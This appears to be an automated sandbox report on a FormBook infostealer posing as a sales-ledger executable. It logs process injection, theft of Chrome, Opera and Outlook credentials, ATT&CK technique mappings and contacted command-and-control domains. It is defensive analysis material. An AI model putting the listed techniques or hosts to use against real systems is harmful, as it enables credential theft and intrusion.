Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmmon32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\cmmon32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping1	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Windows Service1	Application Shimming1	Deobfuscate/Decode Files or Information1	Credential API Hooking1	System Information Discovery114	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Logon Script (Windows)	Access Token Manipulation1	Obfuscated Files or Information4	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Windows Service1	Software Packing13	NTDS	Security Software Discovery331	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection512	Rootkit1	LSA Secrets	Virtualization/Sandbox Evasion41	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion41	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection512	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Require your Sales Ledger from 01-April-2020.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
Require your Sales Ledger from 01-April-2020.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.jiyu-kobo.co.jp/s20	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Pi	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://www.fontbureau.coml1	0%	URL Reputation	safe
http://www.fontbureau.coml1	0%	URL Reputation	safe
http://www.fontbureau.coml1	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	URL Reputation	safe
http://www.seniorlivingcaelderly.com/suod/	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0e	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
www.consultoramulticars.com/suod/	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/5i	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-czti	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/d.	0%	Avira URL Cloud	safe
http://www.seniorlivingcaelderly.com	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmcP	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/fi	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Bi)	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnto	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/q	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0ftYi	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/q	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Yi	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.soretyje.com	81.17.18.194	true	false		unknown
www.seniorlivingcaelderly.com	185.53.179.90	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.seniorlivingcaelderly.com/suod/	true	Avira URL Cloud: safe	unknown
http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3	true	Avira URL Cloud: safe	unknown
www.consultoramulticars.com/suod/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.jiyu-kobo.co.jp/s20	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehpLMEM	cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/?ocid=iehpLMEMh	cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/Pi	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/ocid=iehp	cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.coml1	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/-cz	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0e	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
